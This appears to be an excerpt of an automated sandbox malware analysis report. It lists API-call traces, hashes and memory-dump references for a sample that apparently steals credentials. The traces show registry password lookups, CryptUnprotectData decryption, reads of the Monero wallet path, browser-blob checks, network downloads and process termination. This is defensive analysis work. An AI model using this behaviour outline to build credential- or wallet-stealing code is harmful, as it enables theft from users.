                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: 03e08b40ca113f25b61c9871990e922cbc9e25976e0ceb0ea62fcc9eb898e7b2
                          • Instruction ID: 9c808b0c7ff5531a3260a59cadc25f13ce67939da7815450855fa6eb419af750
                          • Opcode Fuzzy Hash: 03e08b40ca113f25b61c9871990e922cbc9e25976e0ceb0ea62fcc9eb898e7b2
                          • Instruction Fuzzy Hash: B131D672A15214EFCB22DBA8EC89DAFB779EB95700F19051BE50593300DB70ED05DBA0
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B8243
                          • lstrlen.KERNEL32(00000000), ref: 003B8260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B8297
                          • lstrlen.KERNEL32(00000000), ref: 003B82B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B82EB
                          • lstrlen.KERNEL32(00000000), ref: 003B8308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B8337
                          • lstrlen.KERNEL32(00000000), ref: 003B8351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B8380
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 4acf0a6d10d83bde3f4ce200a260101559f743851bd76ccd0cbff0630a458044
                          • Instruction ID: 3585aa113cb625acc8da6c6087cc8bc64a7788704cefe4a277761d3df39d9324
                          • Opcode Fuzzy Hash: 4acf0a6d10d83bde3f4ce200a260101559f743851bd76ccd0cbff0630a458044
                          • Instruction Fuzzy Hash: E4519179A016129BDB16DF68D858AABB7F8EF01700F114515EE0ADBA44EF30ED61CBD0
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003A7805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 003A784A
                          • StrStrA.SHLWAPI(?,Password), ref: 003A78B8
                            • Part of subcall function 003A7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 003A775E
                            • Part of subcall function 003A7750: RtlAllocateHeap.NTDLL(00000000), ref: 003A7765
                            • Part of subcall function 003A7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003A778D
                            • Part of subcall function 003A7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003A77AD
                            • Part of subcall function 003A7750: LocalFree.KERNEL32(?), ref: 003A77B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003A78EC
                          • HeapFree.KERNEL32(00000000), ref: 003A78F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 003A7A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: b04dfc0ddc6560281cd2eb053431dbb1331da3dc03efa3e823135ee3c5f75e85
                          • Instruction ID: cec79b558d1c4d519a8c8824836f1c0d24e7cf7d6e77e98c516a43cbe4917b9c
                          • Opcode Fuzzy Hash: b04dfc0ddc6560281cd2eb053431dbb1331da3dc03efa3e823135ee3c5f75e85
                          • Instruction Fuzzy Hash: AD7121B1D0021DABDB11DF95DCC5AEEB7B9EF55300F10456AE609A7200EB356E89CB90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003A1135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 003A1159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 003A1173
                          • RegCloseKey.ADVAPI32(?), ref: 003A117D
                          Strings
                          • SOFTWARE\monero-project\monero-core, xrefs: 003A114F
                          • wallet_path, xrefs: 003A116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: ecca285b25133e37a27704a24dad3d25f89429d3bb2c680ca415e9e527dca52e
                          • Instruction ID: 8dce9abdb705e365fbb28c9c529109eb052c23131b8d742a4d58da8b0c62a3ed
                          • Opcode Fuzzy Hash: ecca285b25133e37a27704a24dad3d25f89429d3bb2c680ca415e9e527dca52e
                          • Instruction Fuzzy Hash: F3F03075741309BFE7209BE0AC4DFEA7B7CEB14715F100157FE05E2290E6B05A4897A0
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 003A9E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 003A9E42
                          • LocalAlloc.KERNEL32(00000040), ref: 003A9EA7
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          • lstrcpy.KERNEL32(00000000,003D4C48), ref: 003A9FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: a78480f4075a621ecc29dfe7af731fbcbb0e3e9f6f288d06e64d44d62cdacad1
                          • Instruction ID: 88d14732f2991823d73c35d6c505e2c799108c0e59ef3143dc983941dfdb16d4
                          • Opcode Fuzzy Hash: a78480f4075a621ecc29dfe7af731fbcbb0e3e9f6f288d06e64d44d62cdacad1
                          • Instruction Fuzzy Hash: 1D51D231A10209AFCB22EF68EC85B9F77A8EF51315F15402AF949EF251DB70ED158B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003A565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A5661
                          • InternetOpenA.WININET(003CCFEC,00000000,00000000,00000000,00000000), ref: 003A5677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 003A5692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003A56BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 003A56E1
                          • InternetCloseHandle.WININET(?), ref: 003A56FA
                          • InternetCloseHandle.WININET(00000000), ref: 003A5701
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 54ea1e6a4fd213f021be01f2e9ec4ebe1c3bdca964d6632119f666c588d0c1f5
                          • Instruction ID: 3a0ef64accfbc3c5f0af3dd7200d0ac3609d9288703d45daefa85936df9527eb
                          • Opcode Fuzzy Hash: 54ea1e6a4fd213f021be01f2e9ec4ebe1c3bdca964d6632119f666c588d0c1f5
                          • Instruction Fuzzy Hash: 0F419170A01605EFDB25CF54DC88FAAB7B4FF49301F15806AE908EB2A0D7719945CB94
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003C4759
                          • Process32First.KERNEL32(00000000,00000128), ref: 003C4769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003C479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 003C47AB
                          • CloseHandle.KERNEL32(00000000), ref: 003C47B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 003C47C0
                          • CloseHandle.KERNEL32(00000000), ref: 003C47CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 38354ef67044e10e6cf43699fcbaf35bc291bcc20b14f0f93241daac14452a7b
                          • Instruction ID: bac96425cd33d8c64689fabf4cdb2fa78830a954ca5ba921201b1af28796e179
                          • Opcode Fuzzy Hash: 38354ef67044e10e6cf43699fcbaf35bc291bcc20b14f0f93241daac14452a7b
                          • Instruction Fuzzy Hash: BA01B571602215ABE7315B60AC8DFEA77BCEB58752F040187F905D1180EF748D889B60
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B8435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B846C
                          • lstrlen.KERNEL32(00000000), ref: 003B84B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B84E9
                          • lstrlen.KERNEL32(00000000), ref: 003B84FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B852E
                          • StrCmpCA.SHLWAPI(00000000,003D4C3C), ref: 003B853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: f00917e3afbae2e930011928db1d69c3dca82938efa695ec1ed26e11e7a829e4
                          • Instruction ID: 7f7bff802f7e1b74e0bee3fdef91f92c15f34cf5220d53c2f0eaf23884eb3a04
                          • Opcode Fuzzy Hash: f00917e3afbae2e930011928db1d69c3dca82938efa695ec1ed26e11e7a829e4
                          • Instruction Fuzzy Hash: E251CE719002029FCB36DF68D884A9BB7F9EF59304F15845AED46DB605EF30E941CB50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003C2925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C292C
                          • RegOpenKeyExA.ADVAPI32(80000002,00F1B9A8,00000000,00020119,003C28A9), ref: 003C294B
                          • RegQueryValueExA.ADVAPI32(003C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003C2965
                          • RegCloseKey.ADVAPI32(003C28A9), ref: 003C296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 0bba4166fa6ecbec15d237b23a8b54b542c3c0517a62b65c4fa27cbad4435f43
                          • Instruction ID: 0f62316431dfade18c342dd36b59677886b4420c80b6694312eddbd80b57fec8
                          • Opcode Fuzzy Hash: 0bba4166fa6ecbec15d237b23a8b54b542c3c0517a62b65c4fa27cbad4435f43
                          • Instruction Fuzzy Hash: 6301BC75601219ABE320DBA4AC59FFB7BBCEB48711F10009AFE45D7240EA315A0887A0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003C2895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C289C
                            • Part of subcall function 003C2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003C2925
                            • Part of subcall function 003C2910: RtlAllocateHeap.NTDLL(00000000), ref: 003C292C
                            • Part of subcall function 003C2910: RegOpenKeyExA.ADVAPI32(80000002,00F1B9A8,00000000,00020119,003C28A9), ref: 003C294B
                            • Part of subcall function 003C2910: RegQueryValueExA.ADVAPI32(003C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003C2965
                            • Part of subcall function 003C2910: RegCloseKey.ADVAPI32(003C28A9), ref: 003C296F
                          • RegOpenKeyExA.ADVAPI32(80000002,00F1B9A8,00000000,00020119,003B9500), ref: 003C28D1
                          • RegQueryValueExA.ADVAPI32(003B9500,00F2E8F0,00000000,00000000,00000000,000000FF), ref: 003C28EC
                          • RegCloseKey.ADVAPI32(003B9500), ref: 003C28F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: f78b58b7727186be4a0cc79d6bef7c8b524780e9128e79b97258172267fb91ab
                          • Instruction ID: ecf9b401d76b776c3ec994f2fa2acf054bda41b61febf32c3cacc9567b89a151
                          • Opcode Fuzzy Hash: f78b58b7727186be4a0cc79d6bef7c8b524780e9128e79b97258172267fb91ab
                          • Instruction Fuzzy Hash: 0F01A275601209BBD720ABA4AC4DFBB777DEB54311F00015BFE08D6250DA705D48A7A0
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 003A723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 003A7279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003A7280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003A72C3
                          • HeapFree.KERNEL32(00000000), ref: 003A72CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 003A7329
                          Memory Dump Source
